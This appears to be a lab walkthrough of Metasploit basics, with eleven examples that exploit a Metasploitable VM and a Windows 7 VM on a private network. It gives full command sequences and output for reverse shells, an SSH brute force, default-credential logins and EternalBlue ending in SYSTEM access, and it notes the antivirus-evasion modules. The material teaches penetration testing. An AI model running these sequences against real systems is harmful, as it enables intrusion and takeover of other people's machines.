- path to metasplot framework: cd /usr/share/metasploit-framework/
7 Modules metasploit framework contains:
- exploits (buffer overflow, code injection, web application)
- auxiliary (does not execute a payload as an explot module does, but istead it is used to perform different actions such as scanning, fuzzing or denial of service attack. Information gateringand, fingerprinting, scanning )
- post (used as the name, after exploiting the target, gather or steal information from target device: files, saved passwords, dumping hashes, enummerationg services and applications on the target)
- payloads (deliver to the target with and exploit in order to control the machine: singles are payloads that are completly stand alone | stagers are estting up a network connection between the attacker and the victim, are small and reliable (bind or reverse (almost all the time we will use reverse tcp) ) | stages are payload components that are downloaded by stagers modules, can provide advanced features with no size limit example: meterpreters shells (mallware, trojan or virus) that can download files, upload files, record microphone, run webcam, take screenshots, etc)
- encoders (helps evade antivirus detection)
- evasion (similat ro encoders, mainly designed to evade windows defender)
- nops (no-operation is an instruction for the processor to do nothing, useful in buffer overflow to allocate a lot of space in memory before the payload executes)
msfconsole and msfvenom
To run metasplot framework simply run msfconsole in the terminal
- use show payloads command to list all the payloads
- to use a certain exploit use the command: use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
- use show info to get more details about what the particular module exploit can do
- use show options to understand what the module needs to function
- use set <parameter name> example LHOST to change the default already configured IP address
- using show payloads again will now not list again all the payloads but rather just the ones that are compatible with the ceratl selected explot
- use set payload <payload name> t change the default selected payload with another one you have chosen
- use show targets to get a full list of targets that we can exploit using this attack
- use set target 3 to select the 3rd option listed by running the command above
- use exploit to enable/run the exploit
Example 1 – vsftpd 2.3.4
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
- the goal is to find an explot if this software is vulnerable
- as an initial action, before google-ing for possible exploits, you can use metasploit framework
- on terminal2: run $ searchsploit vsftpd 2.3.4
- on terminal3: run msfconsole and then type: msf6 > search vsftpd
- msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
- msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.222.127:21 – USER: 331 Please specify the password.
[+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
[+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400
whoami
root
ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link
- to exit a shell just type: exit
exit
[*] 192.168.222.127 – Command shell session 1 closed.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Example 2 – Misconfiguration bindshell
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 1524/tcp open bindshell Metasploitable root shell
- on terminal2 let’s use a tool called: netcat (a program used to extablish network connections with other machines using both tcp and udp)
- to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
[v1.10-46]
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [-options] [hostname] [port] - to use it run:
┌──(mrhacker㉿kali)-[~/Desktop]
└─$ nc 192.168.222.127 1524
[email protected]:/#
Example 3- telnet
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 23/tcp open telnet Linux telnetd
- on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
- let’s try the default login and username: telnet 192.168.222.127
┌──(mrhacker㉿kali)-[~]
└─$ telnet 192.168.222.127
Trying 192.168.222.127…
Connected to 192.168.222.127.
Escape character is ‘^]’.
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
[email protected]:~$ whoami
msfadmin
[email protected]:~$ sudo su
[sudo] password for msfadmin:
[email protected]:/home/msfadmin# whoami
root
[email protected]:/home/msfadmin#
Example 4- Samba
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
- on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
- on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
- let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
- msf6 auxiliary(scanner/smb/smb_version) > show info
- msf6 auxiliary(scanner/smb/smb_version) > show options
- msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
- msf6 auxiliary(scanner/smb/smb_version) > exploit
- valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
- on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – ‘Username’ map script’ Command Execution (Metasploit) – unix/remote/16320.rb
- on terminal2: run $ search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
- msf6 > use exploit/multi/samba/usermap_script
- msf6 exploit(multi/samba/usermap_script) > show info
- msf6 exploit(multi/samba/usermap_script) > show options
- msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127
msf6 exploit(multi/samba/usermap_script) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400whoami
root
Example 5- Buteforce SSH Attack
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
- let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
- on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
- msf6 > use auxiliary/scanner/ssh/ssh_login
- on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possile usernames but also containing the corect one: admin, root, toor, user123, msfadmin, admin123 | one per line
- on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possile usernames but also containing the corect one: password, password123, helloworld, msfadmin, test1234 | one per line
- on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
PASS_FILE => /home/mrhacker/Desktop/passwords.txt - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
USER_FILE => /home/mrhacker/Desktop/usernames.txt - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127 - on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
VERBOSE => true - msf6 auxiliary(scanner/ssh/ssh_login) > exploit
- [+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
[*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
[-] 192.168.222.127:22 – Failed: ‘admin123:password’ - msf6 auxiliary(scanner/ssh/ssh_login) > sessions
- msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
[*] Starting interaction with 1…whoami
msfadmin
sudo su
[sudo] password for msfadmin: msfadminwhoami
root - as we now have the username and passowrd we could ssh into the machine using the discuvered username and password: msfadmin/msfadmin
- ┌──(mrhacker㉿kali)-[~]
└─$ ssh [email protected]
[email protected]’s password:
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
Example 6 – distccd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
- on terminal2: msfconsole and the run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
- msf6 > use exploit/unix/misc/distcc_exec
- msf6 exploit(unix/misc/distcc_exec) > show options
- msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
- msf6 exploit(unix/misc/distcc_exec) > show payloads
- msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse - msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listenig host)
LHOST => 192.168.222.59 - msf6 exploit(unix/misc/distcc_exec) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo 9JUz23ZkTBY4MuQx;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “9JUz23ZkTBY4MuQx\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400whoami
daemon
hostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 7 – distccd
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
- on terminal3: msfconsole and the run: msf6 > search UnrealIRCd
- msf6 > use 0
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
RHOSTS => 192.168.222.127 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show info
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
- msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > ifconfig
- eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.222.59 netmask 255.255.255.0 broadcast 192.168.222.255 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set LHOST 192.168.222.59
LHOST => 192.168.222.59 - msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit[*] Started reverse TCP double handler on 192.168.222.59:4444
[*] 192.168.222.127:6667 – Connected to 192.168.222.127:6667…
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname…
[*] 192.168.222.127:6667 – Sending backdoor command…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo FtAIdHWFZQ9qDwWD;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “FtAIdHWFZQ9qDwWD\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:44450) at 2021-08-19 10:52:15 -0400whoami
roothostname
metasploitable
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Example 8 – drb
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit drb | too many findings
- on terminal3: msfconsole and the run: msf6 > search drb
- msf6 > use exploit/linux/misc/drb_remote_codeexec
- (this ruby file was removed from kali-linux-2021.2 | still available in kali-linux-2020.2)
Example 9 – vnc
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 5900/tcp open vnc VNC (protocol 3.3)
- on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit vnc | too many findings
- on terminal3: msfconsole and the run: msf6 > search vnc
- this one looks interesting: exploit/multi/vnc/vnc_keyboard_exec | but the payload is one for Windows and it will not work
- let’s try to connect to VNC on the target machine:
- (mrhacker㉿kali)-[~/Desktop] $ vncviewer 192.168.222.127
Connected to RFB server, using protocol version 3.3
Performing standard VNC authentication
Password: password | the password was password
Authentication successful
Example 10- java-rmi
- check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
- on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
- let’s try this one : 1099/tcp open java-rmi GNU Classpath grmiregistry
- on terminal2: msfconsole and the run: msf6 > search java rmi
- msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp - msf6 exploit(multi/misc/java_rmi_server) > show options
- msf6 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.222.127
- msf6 exploit(multi/misc/java_rmi_server) > run
- msf6 exploit(multi/misc/java_rmi_server) > show sessions
- msf6 exploit(multi/misc/java_rmi_server) > sessions -i 1
- meterpreter > help
- meterpreter > shell
Process 1 created.
Channel 1 created.
whoami
root
Example 11 – Windows 7 x64 – Eternalblue NSA-developed Explot
- check the IP address of the Windows 7 x64 virtual machine ipconfig: 192.168.222.205
- on terminal1: run sudo nmap -sS 192.168.222.205
- let’s try these ones: 139/tcp open netbios-ssn and 445/tcp open microsoft-ds
- on terminal2: msfconsole and then run msf6 > search eternalblue
- let’s use this one to test if the target is vulnerable: “auxiliary/scanner/smb/smb_ms17_010”
- msf6 > use 4
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show info
- msf6 auxiliary(scanner/smb/smb_ms17_010) > show options
- msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.222.205RHOSTS => 192.168.222.205
msf6 auxiliary(scanner/smb/smb_ms17_010) >[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > - on terminal2: msfconsole and then run msf6 > search eternalblue
- let’s use this one to test if the target is vulnerable: “exploit/windows/smb/ms17_010_eternalblue”
- msf6 > use 0
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show info
- msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
- msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.222.205
RHOSTS => 192.168.222.205
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.222.59:4444
[*] 192.168.222.205:445 – Executing automatic check (disable AutoCheck to override)
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[+] 192.168.222.205:445 – The target is vulnerable.
[*] 192.168.222.205:445 – Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.222.205:445 – Host is likely VULNERABLE to MS17-010! – Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.222.205:445 – Scanned 1 of 1 hosts (100% complete)
[*] 192.168.222.205:445 – Connecting to target for exploitation.
[+] 192.168.222.205:445 – Connection established for exploitation.
[+] 192.168.222.205:445 – Target OS selected valid for OS indicated by SMB reply
[*] 192.168.222.205:445 – CORE raw buffer dump (38 bytes)
[*] 192.168.222.205:445 – 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
[*] 192.168.222.205:445 – 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
[*] 192.168.222.205:445 – 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 192.168.222.205:445 – Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.222.205:445 – Trying exploit with 12 Groom Allocations.
[*] 192.168.222.205:445 – Sending all but last fragment of exploit packet
[*] 192.168.222.205:445 – Starting non-paged pool grooming
[+] 192.168.222.205:445 – Sending SMBv2 buffers
[+] 192.168.222.205:445 – Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.222.205:445 – Sending final SMBv2 buffers.
[*] 192.168.222.205:445 – Sending last fragment of exploit packet!
[*] 192.168.222.205:445 – Receiving response from exploit packet
[+] 192.168.222.205:445 – ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.222.205:445 – Sending egg to corrupted connection.
[*] 192.168.222.205:445 – Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.222.205
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.222.205:445 – =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 1 opened (192.168.222.59:4444 -> 192.168.222.205:49166) at 2021-08-19 12:33:18 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > help
meterpreter > screenshot
Screenshot saved to: /home/mrhacker/Desktop/OvtUHTeu.jpeg
meterpreter >